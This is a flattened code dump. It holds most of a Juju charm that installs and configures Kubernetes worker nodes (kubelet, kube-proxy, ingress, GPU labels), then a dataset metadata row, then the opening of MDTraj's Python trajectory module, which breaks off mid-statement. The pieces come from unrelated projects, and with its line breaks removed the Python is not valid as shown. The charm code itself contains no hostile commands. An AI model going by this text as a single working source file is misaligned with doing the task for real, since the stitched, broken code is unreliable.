we can reconfigure gpu-related kubelet flags, # since they can differ between k8s versions if is_state('kubernetes-worker.gpu.enabled'): remove_state('kubernetes-worker.gpu.enabled') try: disable_gpu() except ApplyNodeLabelFailed: # Removing node label failed. Probably the master is unavailable. # Proceed with the upgrade in hope GPUs will still be there. hookenv.log('Failed to remove GPU labels. Proceed with upgrade.') remove_state('kubernetes-worker.cni-plugins.installed') remove_state('kubernetes-worker.config.created') remove_state('kubernetes-worker.ingress.available') remove_state('worker.auth.bootstrapped') set_state('kubernetes-worker.restart-needed') def get_snap_resource_paths(): resources = ['kubectl', 'kubelet', 'kube-proxy'] return [hookenv.resource_get(resource) for resource in resources] def check_resources_for_upgrade_needed(): hookenv.status_set('maintenance', 'Checking resources') if any_file_changed(get_snap_resource_paths()): set_upgrade_needed() def set_upgrade_needed(): set_state('kubernetes-worker.snaps.upgrade-needed') config = hookenv.config() require_manual = config.get('require-manual-upgrade') if not require_manual: set_state('kubernetes-worker.snaps.upgrade-specified') def cleanup_pre_snap_services(): # remove old states remove_state('kubernetes-worker.components.installed') # disable old services services = ['kubelet', 'kube-proxy'] for service in services: hookenv.log('Stopping {0} service.'.format(service)) service_stop(service) # cleanup old files files = [ "/lib/systemd/system/kubelet.service", "/lib/systemd/system/kube-proxy.service", "/etc/default/kube-default", "/etc/default/kubelet", "/etc/default/kube-proxy", "/srv/kubernetes", "/usr/local/bin/kubectl", "/usr/local/bin/kubelet", "/usr/local/bin/kube-proxy", "/etc/kubernetes" ] for file in files: if os.path.isdir(file): hookenv.log("Removing directory: " + file) shutil.rmtree(file) elif os.path.isfile(file): hookenv.log("Removing file: " + file) os.remove(file) @when_not('kubernetes-worker.snap.resources-available') def check_snap_resources(): for path in get_snap_resource_paths(): if not path or not os.path.exists(path): msg = 'Missing snap resources.' hookenv.status_set('blocked', msg) return set_state('kubernetes-worker.snap.resources-available') set_state('kubernetes-worker.snaps.upgrade-specified') @when('config.changed.channel') def channel_changed(): set_upgrade_needed() @when('kubernetes-worker.snaps.upgrade-needed', 'kubernetes-worker.snap.resources-available') @when_not('kubernetes-worker.snaps.upgrade-specified') def upgrade_needed_status(): msg = 'Needs manual upgrade, run the upgrade action' hookenv.status_set('blocked', msg) @when('kubernetes-worker.snap.resources-available', 'kubernetes-worker.snaps.upgrade-specified') def install_snaps(): any_file_changed(get_snap_resource_paths()) channel = hookenv.config('channel') hookenv.status_set('maintenance', 'Installing kubectl snap') snap.install('kubectl', channel=channel, classic=True) hookenv.status_set('maintenance', 'Installing kubelet snap') snap.install('kubelet', channel=channel, classic=True) hookenv.status_set('maintenance', 'Installing kube-proxy snap') snap.install('kube-proxy', channel=channel, classic=True) set_state('kubernetes-worker.snaps.installed') set_state('kubernetes-worker.restart-needed') remove_state('kubernetes-worker.snaps.upgrade-needed') remove_state('kubernetes-worker.snaps.upgrade-specified') @hook('stop') def shutdown(): ''' When this unit is destroyed: - delete the current node - stop the worker services ''' try: if os.path.isfile(kubeconfig_path): kubectl('delete', 'node', gethostname().lower()) except CalledProcessError: hookenv.log('Failed to unregister node.') service_stop('snap.kubelet.daemon') service_stop('snap.kube-proxy.daemon') @when('docker.available') @when_not('kubernetes-worker.cni-plugins.installed') def install_cni_plugins(): ''' Unpack the cni-plugins resource ''' charm_dir = os.getenv('CHARM_DIR') # Get the resource via resource_get try: resource_name = 'cni-{}'.format(arch()) archive = hookenv.resource_get(resource_name) except Exception: message = 'Error fetching the cni resource.' hookenv.log(message) hookenv.status_set('blocked', message) return if not archive: hookenv.log('Missing cni resource.') hookenv.status_set('blocked', 'Missing cni resource.') return # Handle null resource publication, we check if filesize < 1mb filesize = os.stat(archive).st_size if filesize < 1000000: hookenv.status_set('blocked', 'Incomplete cni resource.') return hookenv.status_set('maintenance', 'Unpacking cni resource.') unpack_path = '{}/files/cni'.format(charm_dir) os.makedirs(unpack_path, exist_ok=True) cmd = ['tar', 'xfvz', archive, '-C', unpack_path] hookenv.log(cmd) check_call(cmd) apps = [ {'name': 'loopback', 'path': '/opt/cni/bin'} ] for app in apps: unpacked = '{}/{}'.format(unpack_path, app['name']) app_path = os.path.join(app['path'], app['name']) install = ['install', '-v', '-D', unpacked, app_path] hookenv.log(install) check_call(install) # Used by the "registry" action. The action is run on a single worker, but # the registry pod can end up on any worker, so we need this directory on # all the workers. os.makedirs('/srv/registry', exist_ok=True) set_state('kubernetes-worker.cni-plugins.installed') @when('kubernetes-worker.snaps.installed') def set_app_version(): ''' Declare the application version to juju ''' cmd = ['kubelet', '--version'] version = check_output(cmd) hookenv.application_version_set(version.split(b' v')[-1].rstrip()) @when('kubernetes-worker.snaps.installed') @when_not('kube-control.dns.available') def notify_user_transient_status(): ''' Notify to the user we are in a transient state and the application is still converging. Potentially remotely, or we may be in a detached loop wait state ''' # During deployment the worker has to start kubelet without cluster dns # configured. If this is the first unit online in a service pool waiting # to self host the dns pod, and configure itself to query the dns service # declared in the kube-system namespace hookenv.status_set('waiting', 'Waiting for cluster DNS.') @when('kubernetes-worker.snaps.installed', 'kube-control.dns.available') @when_not('kubernetes-worker.snaps.upgrade-needed') def charm_status(kube_control): '''Update the status message with the current status of kubelet.''' update_kubelet_status() def update_kubelet_status(): ''' There are different states that the kubelet can be in, where we are waiting for dns, waiting for cluster turnup, or ready to serve applications.''' services = [ 'kubelet', 'kube-proxy' ] failing_services = [] for service in services: daemon = 'snap.{}.daemon'.format(service) if not _systemctl_is_active(daemon): failing_services.append(service) if len(failing_services) == 0: hookenv.status_set('active', 'Kubernetes worker running.') else: msg = 'Waiting for {} to start.'.format(','.join(failing_services)) hookenv.status_set('waiting', msg) def get_ingress_address(relation): try: network_info = hookenv.network_get(relation.relation_name) except NotImplementedError: network_info = [] if network_info and 'ingress-addresses' in network_info: # just grab the first one for now, maybe be more robust here? return network_info['ingress-addresses'][0] else: # if they don't have ingress-addresses they are running a juju that # doesn't support spaces, so just return the private address return hookenv.unit_get('private-address') @when('certificates.available', 'kube-control.connected') def send_data(tls, kube_control): '''Send the data that is required to create a server certificate for this server.''' # Use the public ip of this unit as the Common Name for the certificate. common_name = hookenv.unit_public_ip() ingress_ip = get_ingress_address(kube_control) # Create SANs that the tls layer will add to the server cert. sans = [ hookenv.unit_public_ip(), ingress_ip, gethostname() ] # Create a path safe name by removing path characters from the unit name. certificate_name = hookenv.local_unit().replace('/', '_') # Request a server cert with this information. tls.request_server_cert(common_name, sans, certificate_name) @when('kube-api-endpoint.available', 'kube-control.dns.available', 'cni.available') def watch_for_changes(kube_api, kube_control, cni): ''' Watch for configuration changes and signal if we need to restart the worker services ''' servers = get_kube_api_servers(kube_api) dns = kube_control.get_dns() cluster_cidr = cni.get_config()['cidr'] if (data_changed('kube-api-servers', servers) or data_changed('kube-dns', dns) or data_changed('cluster-cidr', cluster_cidr)): set_state('kubernetes-worker.restart-needed') @when('kubernetes-worker.snaps.installed', 'kube-api-endpoint.available', 'tls_client.ca.saved', 'tls_client.client.certificate.saved', 'tls_client.client.key.saved', 'tls_client.server.certificate.saved', 'tls_client.server.key.saved', 'kube-control.dns.available', 'kube-control.auth.available', 'cni.available', 'kubernetes-worker.restart-needed', 'worker.auth.bootstrapped') def start_worker(kube_api, kube_control, auth_control, cni): ''' Start kubelet using the provided API and DNS info.''' servers = get_kube_api_servers(kube_api) # Note that the DNS server doesn't necessarily exist at this point. We know # what its IP will eventually be, though, so we can go ahead and configure # kubelet with that info. This ensures that early pods are configured with # the correct DNS even though the server isn't ready yet. dns = kube_control.get_dns() ingress_ip = get_ingress_address(kube_control) cluster_cidr = cni.get_config()['cidr'] if cluster_cidr is None: hookenv.log('Waiting for cluster cidr.') return creds = db.get('credentials') data_changed('kube-control.creds', creds) create_config(random.choice(servers), creds) configure_kubelet(dns, ingress_ip) configure_kube_proxy(servers, cluster_cidr) set_state('kubernetes-worker.config.created') restart_unit_services() update_kubelet_status() set_state('kubernetes-worker.label-config-required') remove_state('kubernetes-worker.restart-needed') @when('cni.connected') @when_not('cni.configured') def configure_cni(cni): ''' Set worker configuration on the CNI relation. This lets the CNI subordinate know that we're the worker so it can respond accordingly. ''' cni.set_config(is_master=False, kubeconfig_path=kubeconfig_path) @when('config.changed.ingress') def toggle_ingress_state(): ''' Ingress is a toggled state. Remove ingress.available if set when toggled ''' remove_state('kubernetes-worker.ingress.available') @when('docker.sdn.configured') def sdn_changed(): '''The Software Defined Network changed on the container so restart the kubernetes services.''' restart_unit_services() update_kubelet_status() remove_state('docker.sdn.configured') @when('kubernetes-worker.config.created') @when_not('kubernetes-worker.ingress.available') def render_and_launch_ingress(): ''' If configuration has ingress daemon set enabled, launch the ingress load balancer and default http backend. Otherwise attempt deletion. ''' config = hookenv.config() # If ingress is enabled, launch the ingress controller if config.get('ingress'): launch_default_ingress_controller() else: hookenv.log('Deleting the http backend and ingress.') kubectl_manifest('delete', '/root/cdk/addons/default-http-backend.yaml') kubectl_manifest('delete', '/root/cdk/addons/ingress-daemon-set.yaml') # noqa hookenv.close_port(80) hookenv.close_port(443) @when('config.changed.labels') def handle_labels_changed(): set_state('kubernetes-worker.label-config-required') @when('kubernetes-worker.label-config-required', 'kubernetes-worker.config.created') def apply_node_labels(): ''' Parse the labels configuration option and apply the labels to the node. ''' # Get the user's configured labels. config = hookenv.config() user_labels = {} for item in config.get('labels').split(' '): if '=' in item: key, val = item.split('=') user_labels[key] = val else: hookenv.log('Skipping malformed option: {}.'.format(item)) # Collect the current label state. current_labels = db.get('current_labels') or {} # Remove any labels that the user has removed from the config. for key in list(current_labels.keys()): if key not in user_labels: try: remove_label(key) del current_labels[key] db.set('current_labels', current_labels) except ApplyNodeLabelFailed as e: hookenv.log(str(e)) return # Add any new labels. for key, val in user_labels.items(): try: set_label(key, val) current_labels[key] = val db.set('current_labels', current_labels) except ApplyNodeLabelFailed as e: hookenv.log(str(e)) return # Set the juju-application label. try: set_label('juju-application', hookenv.service_name()) except ApplyNodeLabelFailed as e: hookenv.log(str(e)) return # Label configuration complete. remove_state('kubernetes-worker.label-config-required') @when_any('config.changed.kubelet-extra-args', 'config.changed.proxy-extra-args') def extra_args_changed(): set_state('kubernetes-worker.restart-needed') @when('config.changed.docker-logins') def docker_logins_changed(): """Set a flag to handle new docker login options. If docker daemon options have also changed, set a flag to ensure the daemon is restarted prior to running docker login. """ config = hookenv.config() if data_changed('docker-opts', config['docker-opts']): hookenv.log('Found new docker daemon options. Requesting a restart.') # State will be removed by layer-docker after restart set_state('docker.restart') set_state('kubernetes-worker.docker-login') @when('kubernetes-worker.docker-login') @when_not('docker.restart') def run_docker_login(): """Login to a docker registry with configured credentials.""" config = hookenv.config() previous_logins = config.previous('docker-logins') logins = config['docker-logins'] logins = json.loads(logins) if previous_logins: previous_logins = json.loads(previous_logins) next_servers = {login['server'] for login in logins} previous_servers = {login['server'] for login in previous_logins} servers_to_logout = previous_servers - next_servers for server in servers_to_logout: cmd = ['docker', 'logout', server] subprocess.check_call(cmd) for login in logins: server = login['server'] username = login['username'] password = login['password'] cmd = ['docker', 'login', server, '-u', username, '-p', password] subprocess.check_call(cmd) remove_state('kubernetes-worker.docker-login') set_state('kubernetes-worker.restart-needed') def arch(): '''Return the package architecture as a string. Raise an exception if the architecture is not supported by kubernetes.''' # Get the package architecture for this system. architecture = check_output(['dpkg', '--print-architecture']).rstrip() # Convert the binary result into a string. architecture = architecture.decode('utf-8') return architecture def create_config(server, creds): '''Create a kubernetes configuration for the worker unit.''' # Get the options from the tls-client layer. layer_options = layer.options('tls-client') # Get all the paths to the tls information required for kubeconfig. ca = layer_options.get('ca_certificate_path') # Create kubernetes configuration in the default location for ubuntu. create_kubeconfig('/home/ubuntu/.kube/config', server, ca, token=creds['client_token'], user='ubuntu') # Make the config dir readable by the ubuntu users so juju scp works. cmd = ['chown', '-R', 'ubuntu:ubuntu', '/home/ubuntu/.kube'] check_call(cmd) # Create kubernetes configuration in the default location for root. create_kubeconfig(kubeclientconfig_path, server, ca, token=creds['client_token'], user='root') # Create kubernetes configuration for kubelet, and kube-proxy services. create_kubeconfig(kubeconfig_path, server, ca, token=creds['kubelet_token'], user='kubelet') create_kubeconfig(kubeproxyconfig_path, server, ca, token=creds['proxy_token'], user='kube-proxy') def parse_extra_args(config_key): elements = hookenv.config().get(config_key, '').split() args = {} for element in elements: if '=' in element: key, _, value = element.partition('=') args[key] = value else: args[element] = 'true' return args def configure_kubernetes_service(service, base_args, extra_args_key): db = unitdata.kv() prev_args_key = 'kubernetes-worker.prev_args.' + service prev_args = db.get(prev_args_key) or {} extra_args = parse_extra_args(extra_args_key) args = {} for arg in prev_args: # remove previous args by setting to null args[arg] = 'null' for k, v in base_args.items(): args[k] = v for k, v in extra_args.items(): args[k] = v cmd = ['snap', 'set', service] + ['%s=%s' % item for item in args.items()] check_call(cmd) db.set(prev_args_key, args) def configure_kubelet(dns, ingress_ip): layer_options = layer.options('tls-client') ca_cert_path = layer_options.get('ca_certificate_path') server_cert_path = layer_options.get('server_certificate_path') server_key_path = layer_options.get('server_key_path') kubelet_opts = {} kubelet_opts['require-kubeconfig'] = 'true' kubelet_opts['kubeconfig'] = kubeconfig_path kubelet_opts['network-plugin'] = 'cni' kubelet_opts['v'] = '0' kubelet_opts['address'] = '0.0.0.0' kubelet_opts['port'] = '10250' kubelet_opts['cluster-domain'] = dns['domain'] kubelet_opts['anonymous-auth'] = 'false' kubelet_opts['client-ca-file'] = ca_cert_path kubelet_opts['tls-cert-file'] = server_cert_path kubelet_opts['tls-private-key-file'] = server_key_path kubelet_opts['logtostderr'] = 'true' kubelet_opts['fail-swap-on'] = 'false' kubelet_opts['node-ip'] = ingress_ip if (dns['enable-kube-dns']): kubelet_opts['cluster-dns'] = dns['sdn-ip'] # set --allow-privileged flag for kubelet kubelet_opts['allow-privileged'] = set_privileged() if is_state('kubernetes-worker.gpu.enabled'): hookenv.log('Adding ' '--feature-gates=DevicePlugins=true ' 'to kubelet') kubelet_opts['feature-gates'] = 'DevicePlugins=true' configure_kubernetes_service('kubelet', kubelet_opts, 'kubelet-extra-args') def configure_kube_proxy(api_servers, cluster_cidr): kube_proxy_opts = {} kube_proxy_opts['cluster-cidr'] = cluster_cidr kube_proxy_opts['kubeconfig'] = kubeproxyconfig_path kube_proxy_opts['logtostderr'] = 'true' kube_proxy_opts['v'] = '0' kube_proxy_opts['master'] = random.choice(api_servers) kube_proxy_opts['hostname-override'] = get_node_name() if b'lxc' in check_output('virt-what', shell=True): kube_proxy_opts['conntrack-max-per-core'] = '0' configure_kubernetes_service('kube-proxy', kube_proxy_opts, 'proxy-extra-args') def create_kubeconfig(kubeconfig, server, ca, key=None, certificate=None, user='ubuntu', context='juju-context', cluster='juju-cluster', password=None, token=None): '''Create a configuration for Kubernetes based on path using the supplied arguments for values of the Kubernetes server, CA, key, certificate, user context and cluster.''' if not key and not certificate and not password and not token: raise ValueError('Missing authentication mechanism.') # token and password are mutually exclusive. Error early if both are # present. The developer has requested an impossible situation. # see: kubectl config set-credentials --help if token and password: raise ValueError('Token and Password are mutually exclusive.') # Create the config file with the address of the master server. cmd = 'kubectl config --kubeconfig={0} set-cluster {1} ' \ '--server={2} --certificate-authority={3} --embed-certs=true' check_call(split(cmd.format(kubeconfig, cluster, server, ca))) # Delete old users cmd = 'kubectl config --kubeconfig={0} unset users' check_call(split(cmd.format(kubeconfig))) # Create the credentials using the client flags. cmd = 'kubectl config --kubeconfig={0} ' \ 'set-credentials {1} '.format(kubeconfig, user) if key and certificate: cmd = '{0} --client-key={1} --client-certificate={2} '\ '--embed-certs=true'.format(cmd, key, certificate) if password: cmd = "{0} --username={1} --password={2}".format(cmd, user, password) # This is mutually exclusive from password. They will not work together. if token: cmd = "{0} --token={1}".format(cmd, token) check_call(split(cmd)) # Create a default context with the cluster. cmd = 'kubectl config --kubeconfig={0} set-context {1} ' \ '--cluster={2} --user={3}' check_call(split(cmd.format(kubeconfig, context, cluster, user))) # Make the config use this new context. cmd = 'kubectl config --kubeconfig={0} use-context {1}' check_call(split(cmd.format(kubeconfig, context))) @when_any('config.changed.default-backend-image', 'config.changed.nginx-image') @when('kubernetes-worker.config.created') def launch_default_ingress_controller(): ''' Launch the Kubernetes ingress controller & default backend (404) ''' config = hookenv.config() # need to test this in case we get in # here from a config change to the image if not config.get('ingress'): return context = {} context['arch'] = arch() addon_path = '/root/cdk/addons/{}' context['defaultbackend_image'] = config.get('default-backend-image') if (context['defaultbackend_image'] == "" or context['defaultbackend_image'] == "auto"): if context['arch'] == 's390x': context['defaultbackend_image'] = \ "k8s.gcr.io/defaultbackend-s390x:1.4" else: context['defaultbackend_image'] = \ "k8s.gcr.io/defaultbackend:1.4" # Render the default http backend (404) replicationcontroller manifest manifest = addon_path.format('default-http-backend.yaml') render('default-http-backend.yaml', manifest, context) hookenv.log('Creating the default http backend.') try: kubectl('apply', '-f', manifest) except CalledProcessError as e: hookenv.log(e) hookenv.log('Failed to create default-http-backend. Will attempt again next update.') # noqa hookenv.close_port(80) hookenv.close_port(443) return # Render the ingress daemon set controller manifest context['ingress_image'] = config.get('nginx-image') if context['ingress_image'] == "" or context['ingress_image'] == "auto": if context['arch'] == 's390x': context['ingress_image'] = \ "docker.io/cdkbot/nginx-ingress-controller-s390x:0.9.0-beta.13" else: context['ingress_image'] = \ "k8s.gcr.io/nginx-ingress-controller:0.9.0-beta.15" # noqa if get_version('kubelet') < (1, 9): context['daemonset_api_version'] = 'extensions/v1beta1' else: context['daemonset_api_version'] = 'apps/v1beta2' context['juju_application'] = hookenv.service_name() manifest = addon_path.format('ingress-daemon-set.yaml') render('ingress-daemon-set.yaml', manifest, context) hookenv.log('Creating the ingress daemon set.') try: kubectl('apply', '-f', manifest) except CalledProcessError as e: hookenv.log(e) hookenv.log('Failed to create ingress controller. Will attempt again next update.') # noqa hookenv.close_port(80) hookenv.close_port(443) return set_state('kubernetes-worker.ingress.available') hookenv.open_port(80) hookenv.open_port(443) def restart_unit_services(): '''Restart worker services.''' hookenv.log('Restarting kubelet and kube-proxy.') services = ['kube-proxy', 'kubelet'] for service in services: service_restart('snap.%s.daemon' % service) def get_kube_api_servers(kube_api): '''Return the kubernetes api server address and port for this relationship.''' hosts = [] # Iterate over every service from the relation object. for service in kube_api.services(): for unit in service['hosts']: hosts.append('https://{0}:{1}'.format(unit['hostname'], unit['port'])) return hosts def kubectl(*args): ''' Run a kubectl cli command with a config file. Returns stdout and throws an error if the command fails. ''' command = ['kubectl', '--kubeconfig=' + kubeclientconfig_path] + list(args) hookenv.log('Executing {}'.format(command)) return check_output(command) def kubectl_success(*args): ''' Runs kubectl with the given args. Returns True if successful, False if not. ''' try: kubectl(*args) return True except CalledProcessError: return False def kubectl_manifest(operation, manifest): ''' Wrap the kubectl creation command when using filepath resources :param operation - one of get, create, delete, replace :param manifest - filepath to the manifest ''' # Deletions are a special case if operation == 'delete': # Ensure we immediately remove requested resources with --now return kubectl_success(operation, '-f', manifest, '--now') else: # Guard against an error re-creating the same manifest multiple times if operation == 'create': # If we already have the definition, its probably safe to assume # creation was true. if kubectl_success('get', '-f', manifest): hookenv.log('Skipping definition for {}'.format(manifest)) return True # Execute the requested command that did not match any of the special # cases above return kubectl_success(operation, '-f', manifest) @when('nrpe-external-master.available') @when_not('nrpe-external-master.initial-config') def initial_nrpe_config(nagios=None): set_state('nrpe-external-master.initial-config') update_nrpe_config(nagios) @when('kubernetes-worker.config.created') @when('nrpe-external-master.available') @when_any('config.changed.nagios_context', 'config.changed.nagios_servicegroups') def update_nrpe_config(unused=None): services = ('snap.kubelet.daemon', 'snap.kube-proxy.daemon') hostname = nrpe.get_nagios_hostname() current_unit = nrpe.get_nagios_unit_name() nrpe_setup = nrpe.NRPE(hostname=hostname) nrpe.add_init_service_checks(nrpe_setup, services, current_unit) nrpe_setup.write() @when_not('nrpe-external-master.available') @when('nrpe-external-master.initial-config') def remove_nrpe_config(nagios=None): remove_state('nrpe-external-master.initial-config') # List of systemd services for which the checks will be removed services = ('snap.kubelet.daemon', 'snap.kube-proxy.daemon') # The current nrpe-external-master interface doesn't handle a lot of logic, # use the charm-helpers code for now. hostname = nrpe.get_nagios_hostname() nrpe_setup = nrpe.NRPE(hostname=hostname) for service in services: nrpe_setup.remove_check(shortname=service) def set_privileged(): """Return 'true' if privileged containers are needed. This is when a) the user requested them b) user does not care (auto) and GPUs are available in a pre 1.9 era """ privileged = hookenv.config('allow-privileged').lower() gpu_needs_privileged = (is_state('kubernetes-worker.gpu.enabled') and get_version('kubelet') < (1, 9)) if privileged == 'auto': privileged = 'true' if gpu_needs_privileged else 'false' if privileged == 'false' and gpu_needs_privileged: disable_gpu() remove_state('kubernetes-worker.gpu.enabled') # No need to restart kubernetes (set the restart-needed state) # because set-privileged is already in the restart path return privileged @when('config.changed.allow-privileged') @when('kubernetes-worker.config.created') def on_config_allow_privileged_change(): """React to changed 'allow-privileged' config value. """ set_state('kubernetes-worker.restart-needed') remove_state('config.changed.allow-privileged') @when('nvidia-docker.installed') @when('kubernetes-worker.config.created') @when_not('kubernetes-worker.gpu.enabled') def enable_gpu(): """Enable GPU usage on this node. """ if get_version('kubelet') < (1, 9): hookenv.status_set( 'active', 'Upgrade to snap channel >= 1.9/stable to enable GPU suppport.' ) return hookenv.log('Enabling gpu mode') try: # Not sure why this is necessary, but if you don't run this, k8s will # think that the node has 0 gpus (as shown by the output of # `kubectl get nodes -o yaml` check_call(['nvidia-smi']) except CalledProcessError as cpe: hookenv.log('Unable to communicate with the NVIDIA driver.') hookenv.log(cpe) return set_label('gpu', 'true') set_label('cuda', 'true') set_state('kubernetes-worker.gpu.enabled') set_state('kubernetes-worker.restart-needed') @when('kubernetes-worker.gpu.enabled') @when_not('nvidia-docker.installed') @when_not('kubernetes-worker.restart-needed') def nvidia_departed(): """Cuda departed, probably due to the docker layer switching to a non nvidia-docker.""" disable_gpu() remove_state('kubernetes-worker.gpu.enabled') set_state('kubernetes-worker.restart-needed') def disable_gpu(): """Disable GPU usage on this node. """ hookenv.log('Disabling gpu mode') # Remove node labels remove_label('gpu') remove_label('cuda') @when('kubernetes-worker.gpu.enabled') @when('kube-control.connected') def notify_master_gpu_enabled(kube_control): """Notify kubernetes-master that we're gpu-enabled. """ kube_control.set_gpu(True) @when_not('kubernetes-worker.gpu.enabled') @when('kube-control.connected') def notify_master_gpu_not_enabled(kube_control): """Notify kubernetes-master that we're not gpu-enabled. """ kube_control.set_gpu(False) @when('kube-control.connected') def request_kubelet_and_proxy_credentials(kube_control): """ Request kubelet node authorization with a well formed kubelet user. This also implies that we are requesting kube-proxy auth. """ # The kube-cotrol interface is created to support RBAC. # At this point we might as well do the right thing and return the hostname # even if it will only be used when we enable RBAC nodeuser = 'system:node:{}'.format(get_node_name().lower()) kube_control.set_auth_request(nodeuser) @when('kube-control.connected') def catch_change_in_creds(kube_control): """Request a service restart in case credential updates were detected.""" nodeuser = 'system:node:{}'.format(get_node_name().lower()) creds = kube_control.get_auth_credentials(nodeuser) if creds and creds['user'] == nodeuser: # We need to cache the credentials here because if the # master changes (master leader dies and replaced by a new one) # the new master will have no recollection of our certs. db.set('credentials', creds) set_state('worker.auth.bootstrapped') if data_changed('kube-control.creds', creds): set_state('kubernetes-worker.restart-needed') @when_not('kube-control.connected') def missing_kube_control(): """Inform the operator they need to add the kube-control relation. If deploying via bundle this won't happen, but if operator is upgrading a a charm in a deployment that pre-dates the kube-control relation, it'll be missing. """ hookenv.status_set( 'blocked', 'Relate {}:kube-control kubernetes-master:kube-control'.format( hookenv.service_name())) @when('docker.ready') def fix_iptables_for_docker_1_13(): """ Fix iptables FORWARD policy for Docker >=1.13 https://github.com/kubernetes/kubernetes/issues/40182 https://github.com/kubernetes/kubernetes/issues/39823 """ cmd = ['iptables', '-w', '300', '-P', 'FORWARD', 'ACCEPT'] check_call(cmd) def _systemctl_is_active(application): ''' Poll systemctl to determine if the application is running ''' cmd = ['systemctl', 'is-active', application] try: raw = check_output(cmd) return b'active' in raw except Exception: return False def get_node_name(): kubelet_extra_args = parse_extra_args('kubelet-extra-args') cloud_provider = kubelet_extra_args.get('cloud-provider', '') if cloud_provider == 'aws': return getfqdn() else: return gethostname() class ApplyNodeLabelFailed(Exception): pass def persistent_call(cmd, retry_message): deadline = time.time() + 180 while time.time() < deadline: code = subprocess.call(cmd) if code == 0: return True hookenv.log(retry_message) time.sleep(1) else: return False def set_label(label, value): nodename = get_node_name() cmd = 'kubectl --kubeconfig={0} label node {1} {2}={3} --overwrite' cmd = cmd.format(kubeconfig_path, nodename, label, value) cmd = cmd.split() retry = 'Failed to apply label %s=%s. Will retry.' % (label, value) if not persistent_call(cmd, retry): raise ApplyNodeLabelFailed(retry) def remove_label(label): nodename = get_node_name() cmd = 'kubectl --kubeconfig={0} label node {1} {2}-' cmd = cmd.format(kubeconfig_path, nodename, label) cmd = cmd.split() retry = 'Failed to remove label {0}. Will retry.'.format(label) if not persistent_call(cmd, retry): raise ApplyNodeLabelFailed(retry)
GoogleCloudPlatform/k8s-multicluster-ingress
vendor/k8s.io/kubernetes/cluster/juju/layers/kubernetes-worker/reactive/kubernetes_worker.py
Python
apache-2.0
38,495
[ "CDK" ]
519b3bc78c8b1bdd5bc3c3f0e83671d38e7565a61ac3254849bad27e4ebde834
############################################################################## # MDTraj: A Python Library for Loading, Saving, and Manipulating # Molecular Dynamics Trajectories. # Copyright 2012-2014 Stanford University and the Authors # # Authors: Robert McGibbon # Contributors: Kyle A. Beauchamp, TJ Lane, Joshua Adelman, Lee-Ping Wang, Jason Swails # # MDTraj is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as # published by the Free Software Foundation, either version 2.1 # of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with MDTraj. If not, see <http://www.gnu.org/licenses/>. ############################################################################## ############################################################################## # Imports ############################################################################## from __future__ import print_function, division import os import warnings from copy import deepcopy from collections import Iterable import numpy as np from mdtraj.formats import DCDTrajectoryFile from mdtraj.formats import BINPOSTrajectoryFile from mdtraj.formats import XTCTrajectoryFile from mdtraj.formats import TRRTrajectoryFile from mdtraj.formats import HDF5TrajectoryFile from mdtraj.formats import NetCDFTrajectoryFile from mdtraj.formats import LH5TrajectoryFile from mdtraj.formats import PDBTrajectoryFile from mdtraj.formats import MDCRDTrajectoryFile from mdtraj.formats import DTRTrajectoryFile from mdtraj.formats import LAMMPSTrajectoryFile from mdtraj.formats import XYZTrajectoryFile from mdtraj.formats import GroTrajectoryFile from mdtraj.formats import AmberNetCDFRestartFile from mdtraj.formats import AmberRestartFile from mdtraj.formats.prmtop import load_prmtop from mdtraj.formats.psf import load_psf from mdtraj.formats.mol2 import load_mol2 from mdtraj.formats.gro import load_gro from mdtraj.formats.arc import load_arc from mdtraj.formats.hoomdxml import load_hoomdxml from mdtraj.core.topology import Topology from mdtraj.core.residue_names import _SOLVENT_TYPES from mdtraj.utils import (ensure_type, in_units_of, lengths_and_angles_to_box_vectors, box_vectors_to_lengths_and_angles, cast_indices, deprecated) from mdtraj.utils.six.moves import xrange from mdtraj.utils.six import PY3, string_types from mdtraj import _rmsd from mdtraj import find_closest_contact from mdtraj import FormatRegistry from mdtraj.geometry import distance ############################################################################## # Globals ############################################################################## __all__ = ['open', 'load', 'iterload', 'load_frame', 'load_topology', 'Trajectory'] # supported extensions for constructing topologies _TOPOLOGY_EXTS = ['.pdb', '.pdb.gz', '.h5','.lh5', '.prmtop', '.parm7', '.psf', '.mol2', '.hoomdxml', '.gro', '.arc', '.hdf5'] ############################################################################## # Utilities ############################################################################## def _assert_files_exist(filenames): """Throw an IO error if files don't exist Parameters ---------- filenames : {str, [str]} String or list of strings to check """ if isinstance(filenames, string_types): filenames = [filenames] for fn in filenames: if not (os.path.exists(fn) and os.path.isfile(fn)): raise IOError('No such file: %s' % fn) def _assert_files_or_dirs_exist(names): """Throw an IO error if files don't exist Parameters ---------- filenames : {str, [str]} String or list of strings to check """ if isinstance(names, string_types): names = [names] for fn in names: if not (os.path.exists(fn) and \ (os.path.isfile(fn) or os.path.isdir(fn))): raise IOError('No such file: %s' % fn) if PY3: def _hash_numpy_array(x): hash_value = hash(x.shape) hash_value ^= hash(x.strides) hash_value ^= hash(x.data.tobytes()) return hash_value else: def _hash_numpy_array(x): writeable = x.flags.writeable try: x.flags.writeable = False hash_value = hash(x.shape) hash_value ^= hash(x.strides) hash_value ^= hash(x.data) finally: x.flags.writeable = writeable return hash_value def load_topology(filename, **kwargs): """Load a topology Parameters ---------- filename : str Path to a file containing a system topology. The following extensions are supported: '.pdb', '.pdb.gz', '.h5','.lh5', '.prmtop', '.parm7', '.psf', '.mol2', '.hoomdxml' Returns ------- topology : md.Topology """ return _parse_topology(filename, **kwargs) def _parse_topology(top, **kwargs): """Get the topology from a argument of indeterminate type If top is a string, we try loading a pdb, if its a trajectory we extract its topology. Returns ------- topology : md.Topology """ if isinstance(top, string_types): ext = _get_extension(top) else: ext = None # might not be a string if isinstance(top, string_types) and (ext in ['.pdb', '.pdb.gz', '.h5','.lh5']): _traj = load_frame(top, 0, **kwargs) topology = _traj.topology elif isinstance(top, string_types) and (ext in ['.prmtop', '.parm7']): topology = load_prmtop(top, **kwargs) elif isinstance(top, string_types) and (ext in ['.psf']): topology = load_psf(top, **kwargs) elif isinstance(top, string_types) and (ext in ['.mol2']): topology = load_mol2(top, **kwargs).topology elif isinstance(top, string_types) and (ext in ['.gro']): topology = load_gro(top, **kwargs).topology elif isinstance(top, string_types) and (ext in ['.arc']): topology = load_arc(top, **kwargs).topology elif isinstance(top, string_types) and 